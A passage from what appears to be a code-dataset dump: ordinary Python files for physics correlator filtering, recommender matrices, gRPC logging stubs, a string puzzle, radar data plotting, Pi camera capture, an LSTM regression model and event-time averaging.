information_about_run.int_fields_info.sink_momenta:\n\t\tappend_standard_TDD_cc(l,name=\"N-N\",pf1=pf1,gammas=[5,5],diagrams=range(0,2),source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_D_D(l,information_about_run):\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor gammas in information_about_run.int_fields_info.gamma_component_D_D:\n\t\t\tappend_standard_TDD_cc(l,name=\"D-D\",pf1=pf1,gammas=gammas,diagrams=range(0,6),source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_pixN_D(l,information_about_run):\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\t\tfor gammas in information_about_run.int_fields_info.gamma_component_piN_D:\n\t\t\t\tappend_standard_TDD_cc(l,name=\"pixN-D\",pf1=pf1,pi2=pi2,gammas=gammas,diagrams=range(0,6),source_timeslices=information_about_run.get_source_timeslices())\n\t\t\ndef append_p1_cc_pixN_pixN(l,information_about_run):\n\t\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor pf2 in information_about_run.int_fields_info.seq2_source_momenta:\n\t\t\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\t\t\tappend_standard_TDD_cc(l,name=\"pixN-pixN\",pf1=pf1,pf2=pf2,pi2=pi2,gammas=[5,5],diagrams=range(0,12),source_timeslices=information_about_run.get_source_timeslices())\n\ndef get_ccs_for_run(information_about_run):\n\tl = []\n\tappend_p1_cc_pi_pi(l,information_about_run)\n\tappend_p1_cc_N_N(l,information_about_run)\n\tappend_p1_cc_D_D(l,information_about_run)\n\tappend_p1_cc_pixN_D(l,information_about_run)\n\tappend_p1_cc_pixN_pixN(l,information_about_run)\n\treturn l\n\t\t\ndef 
apply_filter_to_ccs(ccs,cc_filter):\n\tfiltered_ccs = []\n\tfor cc in ccs:\n\t\tif cc_filter(cc):\n\t\t\tfiltered_ccs.append(cc)\n\treturn filtered_ccs\n\ndef np_1d_arrays_are_equal(a1,a2):\n\tassert(len(a1.shape) == 1)\n\tassert(len(a2.shape) == 1)\n\tif a1.shape[0] != a2.shape[0]:\n\t\treturn False\n\tfor i in range(0,a1.shape[0]):\n\t\tif a1[i] != a2[i]:\n\t\t\treturn False\n\treturn True\n\ndef mom_is_zero(p):\n\treturn np_1d_arrays_are_equal(np.asarray(p),np.asarray([0,0,0]))\n\ndef get_mom_from_cc(momstr,cc):\n\tif momstr == \"pi1\":\n\t\treturn get_pi1_from_cc(cc)\n\n\tp = np.asarray([0,0,0])\n\tif momstr in cc:\n\t\tp = np.asarray(cc[momstr])\n\treturn p\n\ndef get_pi1_from_cc(cc):\n\tif \"pi1\" in cc:\n\t\treturn np.asarray(cc[\"pi1\"])\n\telse:\n\t\treturn calc_pi1(cc)\n\ndef total_initial_mom_is_zero(cc):\n\tpi1 = get_pi1_from_cc(cc)\n\tpi2 = get_mom_from_cc(\"pi2\",cc)\n\treturn mom_is_zero(pi1+pi2)\n\ndef total_final_mom_is_zero(cc):\n\tpf1 = get_mom_from_cc(\"pf1\",cc)\n\tpf2 = get_mom_from_cc(\"pf2\",cc)\n\treturn mom_is_zero(pf1+pf2)\t\n\ndef com_frame_filter(cc):\n\tif total_initial_mom_is_zero(cc) and total_final_mom_is_zero(cc):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef standard_setup_filter(cc):\n\tif process_with_momenta_and_gammas_filter(\"pi-pi\",[0,0,0],None,[0,0,0],None,None,cc):\n\t\treturn True\n\n\tif process_with_momenta_and_gammas_filter(\"N-N\",[0,0,0],None,[0,0,0],None,[5,5],cc):\n\t\treturn True\n\n\tfor i in range(0,3):\n\n\t\tif process_with_momenta_and_gammas_filter(\"D-D\",[0,0,0],None,[0,0,0],None,[i+1,i+1],cc):\n\t\t\treturn True\n\n\t\tfor val in [1,-1]:\n\t\t\tp = np.asarray([0,0,0])\n\t\t\tp[i] = val\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-D\",p,-p,[0,0,0],None,[i+1,5],cc):\n\t\t\t\treturn True\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-pixN\",p,-p,-p,p,[5,5],cc):\n\t\t\t\treturn True\n\n\treturn False\n\ndef pixN_pixN_off_diagonal_filter(cc):\n\n\tfor i in range(0,3):\n\n\t\tfor val in [1,-1]:\n\t\t\tp = np.asarray([0,0,0])\n\t\t\tp[i] = val\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-pixN\",p,-p,p,-p,[5,5],cc):\n\t\t\t\treturn True\n\n\treturn False\n\ndef baryon_2pt_3pt_filter(cc):\n\tif not (cc[\"name\"] == \"N-N\" or cc[\"name\"] == \"pixN-D\" or cc[\"name\"] == \"D-D\"):\n\t\treturn False\n\treturn True\n\ndef mom_filter_check(cc,momstr,mom):\n\tif mom == None:\n\t\treturn True\n\tif not momstr == \"pi1\" and not momstr in cc:\n\t\treturn False\n\treturn np_1d_arrays_are_equal(get_mom_from_cc(momstr,cc),np.asarray(mom))\n\ndef process_with_momenta_filter(process_name,pi1,pi2,pf1,pf2,cc):\n\tif cc[\"name\"] != process_name:\n\t\treturn False\n\n\tif not mom_filter_check(cc,\"pf1\",pf1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pf2\",pf2):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi1\",pi1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi2\",pi2):\n\t\treturn False\n\n\treturn True\n\ndef gamma_filter_check(cc,gammas):\n\tif not \"gammas\" in cc:\n\t\tif gammas is None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\treturn np_1d_arrays_are_equal(np.asarray(cc[\"gammas\"]),np.asarray(gammas))\n\ndef process_with_momenta_and_gammas_filter(process_name,pi1,pi2,pf1,pf2,gammas,cc):\n\tif cc[\"name\"] != process_name:\n\t\treturn False\n\n\tif not mom_filter_check(cc,\"pf1\",pf1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pf2\",pf2):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi1\",pi1):\n\t\treturn False\n\tif not 
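# --- editor's illustrative sketch (not part of the dataset records) ---
# get_all_combinations() above builds the Cartesian product recursively,
# treating a None entry as the single element [None]. itertools.product
# expresses the same thing directly:
from itertools import product

def all_combinations(lists):
    normalized = [l if l is not None else [None] for l in lists]
    return [list(t) for t in product(*normalized)]

assert all_combinations([[1, 2], None]) == [[1, None], [2, None]]
assert len(all_combinations([[5, 4, 6], [5, 4, 6]])) == 9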
mom_filter_check(cc,\"pi2\",pi2):\n\t\treturn False\n\n\tif not gamma_filter_check(cc,gammas):\n\t\treturn False\n\n\treturn True\n\n\n","sub_path":"project_information.py","file_name":"project_information.py","file_ext":"py","file_size_in_byte":12735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220174491","text":"import csv\nimport pickle\nfrom movies import Movies, Ratings\nfrom csvreader import save_list_object\nimport numpy as np\nfrom utilityfunctions import read_object, get_key, save_list_object\n\n\nmovies_list = read_object('objects/test100/movie_list.pkl')\nratings_list_base = read_object('objects/test100/rating_list_base.pkl')\nratings_list_test = read_object('objects/test100/rating_list_test.pkl')\n\nno_of_users = int(ratings_list_base[len(ratings_list_base)-1].user_id)\nno_of_movies = int(len(movies_list))\n\nmovie_id_mapper = {}\n\n\ncount = 0\nfor movie in movies_list:\n movie_id_mapper[movie.movie_id] = count\n count += 1\n\nbase_matrix = []\ntest_matrix = []\n\nfor i in range(0, no_of_users, 1):\n new_row = []\n for j in range(0, no_of_movies, 1):\n new_row.append(0)\n base_matrix.append(new_row)\n\nfor base_rating in ratings_list_base:\n x = int(base_rating.user_id)\n y = base_rating.movie_id\n z = int(movie_id_mapper[y])\n #print('Movie id = ', y, 'Index = ', z)\n base_matrix[x-1][z] = float(base_rating.rating)\n\nfor i in range(0, no_of_users, 1):\n new_row = []\n for j in range(0, no_of_movies, 1):\n new_row.append(0)\n test_matrix.append(new_row)\n\nfor test_rating in ratings_list_test:\n x = int(test_rating.user_id)\n y = test_rating.movie_id\n z = int(movie_id_mapper[y])\n #print('Movie id = ', y, 'Index = ', z)\n test_matrix[x-1][z] = float(test_rating.rating)\n\n\nsave_list_object(base_matrix, 'objects/test100/base_matrix.pkl')\nsave_list_object(test_matrix, 'objects/test100/test_matrix.pkl')\nsave_list_object(movie_id_mapper, 'objects/test100/movie_mapper.pkl')\n\n'''\n\n#Loading saved matrix and movie mapper dictionary from pickle file#\n\nload_base_matrix = read_object('objects/test100/base_matrix.pkl')\nload_test_matrix = read_object('objects/test100/test_matrix.pkl')\nmovie_id_mapper = read_object('objects/test100/movie_mapper.pkl')\n\n\ny = np.array([np.array(row) for row in load_base_matrix])\nz = np.array([np.array(row) for row in load_test_matrix])\n\n\nfor i in range(no_of_users):\n for j in range(no_of_movies):\n if int(y[i][j]) != 0:\n print(i+1, get_key(movie_id_mapper, j), y[i][j])\n\nfor i in range(no_of_users):\n for j in range(no_of_movies):\n if int(z[i][j]) != 0:\n print(i+1, get_key(movie_id_mapper, j), z[i][j])\n\n\n\n'''","sub_path":"recommendersystems/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"384484779","text":"import grpc\nfrom grpc.framework.common import cardinality\nfrom grpc.framework.interfaces.face import utilities as face_utilities\n\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as 
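# --- editor's illustrative sketch (not part of the dataset records; the sample
# --- ratings are hypothetical) ---
# The rating-matrix record above builds user x movie grids as nested Python
# lists. With NumPy the same construction is a zero array plus indexed writes:
import numpy as np

n_users, n_movies = 4, 3
ratings = [(1, 0, 4.0), (2, 2, 3.5), (4, 1, 5.0)]  # (user_id, movie_idx, rating)

base = np.zeros((n_users, n_movies))
for user_id, movie_idx, rating in ratings:
    base[user_id - 1, movie_idx] = rating          # user ids are 1-based
assert base[0, 0] == 4.0 and base[3, 1] == 5.0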
google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\n\n\nclass LoggingServiceV2Stub(object):\n \"\"\"Service for ingesting and querying logs.\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.DeleteLog = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/DeleteLog',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.DeleteLogRequest.SerializeToString,\n response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n )\n self.WriteLogEntries = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/WriteLogEntries',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesResponse.FromString,\n )\n self.ListLogEntries = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/ListLogEntries',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesResponse.FromString,\n )\n self.ListMonitoredResourceDescriptors = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/ListMonitoredResourceDescriptors',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.FromString,\n )\n\n\nclass LoggingServiceV2Servicer(object):\n \"\"\"Service for ingesting and querying logs.\n \"\"\"\n\n def DeleteLog(self, request, context):\n \"\"\"Deletes all the log entries in a log.\n The log reappears if it receives new entries.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteLogEntries(self, request, context):\n \"\"\"Writes log entries to Stackdriver Logging. All log entries are\n written by this method.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ListLogEntries(self, request, context):\n \"\"\"Lists log entries. Use this method to retrieve log entries from Cloud\n Logging. 
For ways to export log entries, see\n [Exporting Logs](/logging/docs/export).\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ListMonitoredResourceDescriptors(self, request, context):\n \"\"\"Lists the monitored resource descriptors used by Stackdriver Logging.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_LoggingServiceV2Servicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'DeleteLog': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteLog,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.DeleteLogRequest.FromString,\n response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n ),\n 'WriteLogEntries': grpc.unary_unary_rpc_method_handler(\n servicer.WriteLogEntries,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesResponse.SerializeToString,\n ),\n 'ListLogEntries': grpc.unary_unary_rpc_method_handler(\n servicer.ListLogEntries,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesResponse.SerializeToString,\n ),\n 'ListMonitoredResourceDescriptors': grpc.unary_unary_rpc_method_handler(\n servicer.ListMonitoredResourceDescriptors,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'google.logging.v2.LoggingServiceV2', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n","sub_path":"Android App/clothonfly webapp/env/lib/python3.7/site-packages/google/cloud/grpc/logging/v2/logging_pb2_grpc.py","file_name":"logging_pb2_grpc.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364521845","text":"def make_char_freq(s):\n char_pool = {}\n for i in s:\n if i in char_pool:\n char_pool[i] += 1\n else:\n char_pool[i] = 1\n return char_pool\n\n\ndef scramble(s1, s2):\n char_pool = make_char_freq(s1)\n char_needed = make_char_freq(s2)\n\n for char in char_needed:\n num_needed = char_needed[char]\n if char not in char_pool or char_pool[char] < num_needed:\n return False\n\n return True\n\n\nprint(scramble('rkqodlw', 'world'))\nprint(scramble('cedewaraaossoqqyt', 'codewars'))\nprint(scramble('katas', 'steak'))\nprint(scramble('scriptjava', 'javascript'))\nprint(scramble('scriptingjava', 'javascript'))\n","sub_path":"Codewars/5kyu/scrambles.py","file_name":"scrambles.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"142850050","text":"#!/usr/bin/env python\n\n\"\"\"fitacf_plots.py: module is dedicated to produce plots for fitacf++ datafiles.\"\"\"\n\n__author__ = \"Chakraborty, S.\"\n__copyright__ = \"Copyright 2021, SuperDARN@VT\"\n__credits__ = 
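The frequency-map check in scrambles.py above can also be phrased with collections.Counter; an equivalent sketch (not the author's version) with identical semantics:

from collections import Counter

def scramble_counter(s1, s2):
    # s2 is buildable from s1 iff subtracting s1's character counts
    # from s2's leaves no positive deficit behind.
    return not (Counter(s2) - Counter(s1))

assert scramble_counter('rkqodlw', 'world')
assert not scramble_counter('katas', 'steak')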
[]\n__license__ = \"MIT\"\n__version__ = \"1.0.\"\n__maintainer__ = \"Chakraborty, S.\"\n__email__ = \"shibaji7@vt.edu\"\n__status__ = \"Research\"\n\n\nimport numpy as np\nnp.random.seed(0)\nimport sys\nsys.path.append(\"sd/\")\nsys.path.append(\"tools/\")\nimport datetime as dt\nimport argparse\nfrom dateutil import parser as prs\nfrom loguru import logger\nimport json\n\nfrom plot_processed_data import PlotProcessedData\n\ndef run_fitacf_amgeo_plotting(param_file, rad, start, end, sim_id, cid, verbose):\n    \"\"\"\n    Method dedicated to running fitacf++ output plots\n    \n    Input parameters\n    ----------------\n    param_file : Parameter file .json\n    rad : Radar code\n    start : Start datetime object\n    end : End datetime object\n    sim_id : Simulation ID\n    cid : Cluster ID\n    verbose : If true, print to console\n    \n    Return parameters\n    -----------------\n    _dict_ {\n        folder_location : folder location holding the generated plots\n    }\n    \"\"\"\n    scan_info = None\n    # NOTE: fetch_print_fit_rec is neither defined nor imported in this module.\n    if param_file is None: scan_info = fetch_print_fit_rec(rad, start, start + dt.timedelta(minutes=5))\n    proc = PlotProcessedData(param_file, rad, [start, end], sim_id, scan_info, cid, verbose)\n    return proc.out\n\n# Script run can also be done via main program\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-p\", \"--param_file\", default=\"data/outputs/L101/bks/params.json\", \n            help=\"Output parameter file from the fitacf++ run\")\n    parser.add_argument(\"-r\", \"--rad\", default=None, help=\"SuperDARN radar code\")\n    parser.add_argument(\"-s\", \"--start\", default=None, help=\"Start date (e.g. 2015-03-17T03)\", type=prs.parse)\n    parser.add_argument(\"-e\", \"--end\", default=None, help=\"End date (e.g. 2015-03-17T03:02)\", type=prs.parse)\n    parser.add_argument(\"-v\", \"--verbose\", action=\"store_false\", help=\"Increase output verbosity (default True)\")\n    parser.add_argument(\"-sid\", \"--sim_id\", default=\"L100\", help=\"Simulation ID, need to store data into this folder (default L100)\")\n    parser.add_argument(\"-cid\", \"--cluster_id\", default=None, type=int, help=\"Cluster ID related plot\")\n    args = parser.parse_args()\n    logger.info(f\"Simulation run using fitacf_plots.__main__\")\n    if args.verbose:\n        logger.info(\"Parameter list for plotting simulation \")\n        for k in vars(args).keys():\n            print(\" \", k, \"->\", vars(args)[k])\n    _o = run_fitacf_amgeo_plotting(args.param_file, args.rad, args.start, args.end, args.sim_id, args.cluster_id, args.verbose)\n    logger.info(f\"Simulation output from fitacf_plots.__main__\\n{json.dumps(_o, sort_keys=True, indent=4)}\")\n    pass","sub_path":"fitacf_plots.py","file_name":"fitacf_plots.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50532394","text":"from picamera import PiCamera\nfrom time import sleep\nimport datetime\n\ndef cheese():\n    camera=PiCamera()\n    camera.start_preview()\n    sleep(2) \n    camera.capture('/home/honky/server/static/pics/garden-now.jpg')\n    camera.stop_preview()\n    camera.close()\n\ndef update():\n    timenow = datetime.datetime.now()\n    camera=PiCamera()\n    camera.start_preview()\n    sleep(2) \n    camera.capture('/home/honky/server/static/pics/' + timenow.strftime('%m-%d-%y') + '.jpg')\n    camera.stop_preview()\n    camera.close()\n\n    print(\"Yippy dippy doo\")\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
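camera.py above repeats the preview/capture/close sequence in both functions; a hedged consolidation sketch using the same picamera calls and the original paths:

from time import sleep
import datetime
from picamera import PiCamera

def capture_to(path):
    camera = PiCamera()
    try:
        camera.start_preview()
        sleep(2)  # give the sensor time to settle before capturing
        camera.capture(path)
        camera.stop_preview()
    finally:
        camera.close()  # release the camera even if the capture fails

def cheese():
    capture_to('/home/honky/server/static/pics/garden-now.jpg')

def update():
    stamp = datetime.datetime.now().strftime('%m-%d-%y')
    capture_to('/home/honky/server/static/pics/' + stamp + '.jpg')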
+{"seq_id":"109852057","text":"from __Base.BaseClass import NeuralNetwork_Base\nfrom DepressionRecognition.Tools import Shuffle_Part3\nimport numpy\nimport tensorflow\nfrom tensorflow.contrib import rnn\n\n\nclass DBLSTM(NeuralNetwork_Base):\n def __init__(self, trainData, trainLabel, trainSeq, featureShape=40, firstAttention=None, secondAttention=None,\n firstAttentionScope=None, secondAttentionScope=None, firstAttentionName=None, secondAttentionName=None,\n batchSize=32, rnnLayers=2, hiddenNodules=128, learningRate=1E-3, startFlag=True, graphRevealFlag=True,\n graphPath='logs/', occupyRate=-1, lossType='RMSE'):\n self.seq = trainSeq\n self.featureShape = featureShape\n self.firstAttention, self.secondAttention = firstAttention, secondAttention\n\n self.firstAttentionScope, self.secondAttentionScope = firstAttentionScope, secondAttentionScope\n self.firstAttentionName, self.secondAttentionName = firstAttentionName, secondAttentionName\n\n self.rnnLayers, self.hiddenNodules = rnnLayers, hiddenNodules\n self.lossType = lossType\n\n super(DBLSTM, self).__init__(trainData=trainData, trainLabel=trainLabel, batchSize=batchSize,\n learningRate=learningRate, startFlag=startFlag, graphRevealFlag=graphRevealFlag,\n graphPath=graphPath, occupyRate=occupyRate)\n\n def BuildNetwork(self, learningRate):\n self.dataInput = tensorflow.placeholder(dtype=tensorflow.float32, shape=[None, None, self.featureShape],\n name='dataInput')\n self.labelInput = tensorflow.placeholder(dtype=tensorflow.float32, shape=None, name='labelInput')\n self.seqInput = tensorflow.placeholder(dtype=tensorflow.int64, shape=None, name='seqInput')\n\n ##########################################################################\n\n self.parameters['BatchSize'], self.parameters['TimeStep'], _ = tensorflow.unstack(\n tensorflow.shape(input=self.dataInput, name='Parameter'))\n\n ##########################################################################\n\n with tensorflow.variable_scope('First_BLSTM'):\n self.parameters['First_FW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)], state_is_tuple=True)\n self.parameters['First_BW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)], state_is_tuple=True)\n\n self.parameters['First_Output'], self.parameters['First_FinalState'] = \\\n tensorflow.nn.bidirectional_dynamic_rnn(cell_fw=self.parameters['First_FW_Cell'],\n cell_bw=self.parameters['First_BW_Cell'], inputs=self.dataInput,\n sequence_length=self.seqInput, dtype=tensorflow.float32)\n\n ##########################################################################\n\n if self.firstAttention is None:\n self.parameters['First_FinalOutput'] = tensorflow.concat(\n [self.parameters['First_FinalState'][self.rnnLayers - 1][0].h,\n self.parameters['First_FinalState'][self.rnnLayers - 1][1].h], axis=1)\n else:\n self.firstAttentionList = self.firstAttention(dataInput=self.parameters['First_Output'],\n scopeName=self.firstAttentionName,\n hiddenNoduleNumber=2 * self.hiddenNodules,\n attentionScope=self.firstAttentionScope, blstmFlag=True)\n self.parameters['First_FinalOutput'] = self.firstAttentionList['FinalResult']\n\n ##########################################################################\n\n with tensorflow.variable_scope('Second_BLSTM'):\n self.parameters['Second_FW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in 
range(self.rnnLayers)],\n state_is_tuple=True)\n self.parameters['Second_BW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)],\n state_is_tuple=True)\n\n self.parameters['Second_Output'], self.parameters['Second_FinalState'] = \\\n tensorflow.nn.bidirectional_dynamic_rnn(\n cell_fw=self.parameters['Second_FW_Cell'], cell_bw=self.parameters['Second_BW_Cell'],\n inputs=self.parameters['First_FinalOutput'][tensorflow.newaxis, :, :],\n dtype=tensorflow.float32)\n\n ##########################################################################\n\n if self.secondAttention is None:\n self.parameters['Second_FinalOutput'] = tensorflow.concat(\n [self.parameters['Second_FinalState'][self.rnnLayers - 1][0].h,\n self.parameters['Second_FinalState'][self.rnnLayers - 1][1].h], axis=1)\n else:\n self.secondAttentionList = self.secondAttention(dataInput=self.parameters['Second_Output'],\n scopeName=self.secondAttentionName,\n hiddenNoduleNumber=2 * self.hiddenNodules,\n attentionScope=self.secondAttentionScope, blstmFlag=True)\n self.parameters['Second_FinalOutput'] = self.secondAttentionList['FinalResult']\n\n self.parameters['FinalPredict'] = tensorflow.reshape(\n tensor=tensorflow.layers.dense(inputs=self.parameters['Second_FinalOutput'], units=1,\n activation=None, name='FinalPredict'), shape=[1])\n\n if self.lossType == 'MSE':\n self.parameters['Loss'] = tensorflow.losses.mean_squared_error(labels=self.labelInput,\n predictions=self.parameters['FinalPredict'])\n if self.lossType == 'RMSE':\n self.parameters['Loss'] = tensorflow.sqrt(\n tensorflow.losses.mean_squared_error(labels=self.labelInput,\n predictions=self.parameters['FinalPredict']))\n if self.lossType == 'MAE':\n self.parameters['Loss'] = tensorflow.losses.absolute_difference(labels=self.labelInput,\n predictions=self.parameters['FinalPredict'])\n\n self.train = tensorflow.train.AdamOptimizer(learning_rate=learningRate).minimize(self.parameters['Loss'])\n\n def Train(self, logName):\n trainData, trainLabel, trainSeq = Shuffle_Part3(data=self.data, label=self.label, seq=self.seq)\n totalLoss = 0\n with open(logName, 'w') as file:\n for index in range(len(trainData)):\n loss, _ = self.session.run(fetches=[self.parameters['Loss'], self.train],\n feed_dict={self.dataInput: trainData[index],\n self.labelInput: trainLabel[index],\n self.seqInput: trainSeq[index]})\n totalLoss += loss\n file.write(str(loss) + '\\n')\n print('\\rTraining %d/%d Loss = %f' % (index, len(trainData), loss), end='')\n return totalLoss\n\n def Test(self, testData, testLabel, testSeq, logName):\n with open(logName, 'w') as file:\n for index in range(len(testData)):\n print('\\rTesting %d/%d' % (index, len(testData)), end='')\n predict = self.session.run(fetches=self.parameters['FinalPredict'],\n feed_dict={self.dataInput: testData[index], self.seqInput: testSeq[index]})\n file.write(str(testLabel[index][0]) + ',' + str(predict[0]) + '\\n')\n\n def Valid(self):\n trainData, trainLabel, trainSeq = self.data, self.label, self.seq\n\n result = self.session.run(fetches=self.parameters['First_Output'],\n feed_dict={self.dataInput: trainData[0], self.labelInput: trainLabel[0],\n self.seqInput: trainSeq[0]})\n print(result)\n print(numpy.shape(result))\n","sub_path":"DepressionRecognition/Model/DBLSTM.py","file_name":"DBLSTM.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312078179","text":"import 
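DBLSTM above picks between MSE, RMSE and MAE via its lossType argument; a plain-numpy sketch (function name hypothetical, independent of TensorFlow) of what the three branches compute:

import numpy as np

def regression_loss(labels, predictions, loss_type='RMSE'):
    labels = np.asarray(labels, dtype=float)
    predictions = np.asarray(predictions, dtype=float)
    if loss_type == 'MSE':
        return np.mean((labels - predictions) ** 2)
    if loss_type == 'RMSE':
        return np.sqrt(np.mean((labels - predictions) ** 2))
    if loss_type == 'MAE':
        return np.mean(np.abs(labels - predictions))
    raise ValueError('unknown loss type: %s' % loss_type)

print(regression_loss([3.0], [5.0], 'RMSE'))  # 2.0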
fileJedi\nfrom datetime import datetime, timedelta\n\n\ndef calculateAverageTimes(events, windowSize):\n    # Sort the events by timeStamp\n    events = sorted(events, key=lambda k: k['timestamp'])\n\n    # Build Output List\n    outputList = buildOutputList(events, windowSize)\n\n    # Get the average times\n    outputList = fillAverageTimes(events, windowSize, outputList)\n\n    return outputList\n\n\ndef fillAverageTimes(events, windowSize, outputList):\n\n    for result in outputList:\n        result = getMinuteAverage(result, events, windowSize)\n\n    return outputList\n\n\ndef getMinuteAverage(minuteResult, events, windowSize):\n    # More info in the README.md file\n    avg = 0.0\n    avgWords = 0.0\n    numberOfEvents = 0\n    toRemove = []\n\n    for event in events:\n        eventTime = datetime.strptime(\n            event['timestamp'], '%Y-%m-%d %H:%M:%S.%f')\n\n        if eventTime >= minuteResult['date'] - timedelta(0, 60 * windowSize) and eventTime <= minuteResult['date']:\n            avg = avg + event['duration']\n            avgWords = avgWords + event['nr_words']\n            numberOfEvents = numberOfEvents + 1\n        elif eventTime < minuteResult['date'] - timedelta(0, 60 * windowSize):\n            toRemove.append(events.index(event))\n\n        elif eventTime > minuteResult['date']:\n            break\n\n    # Delete from the highest index down so the remaining indices stay valid.\n    for index in sorted(toRemove, reverse=True):\n        del events[index]\n\n    if numberOfEvents 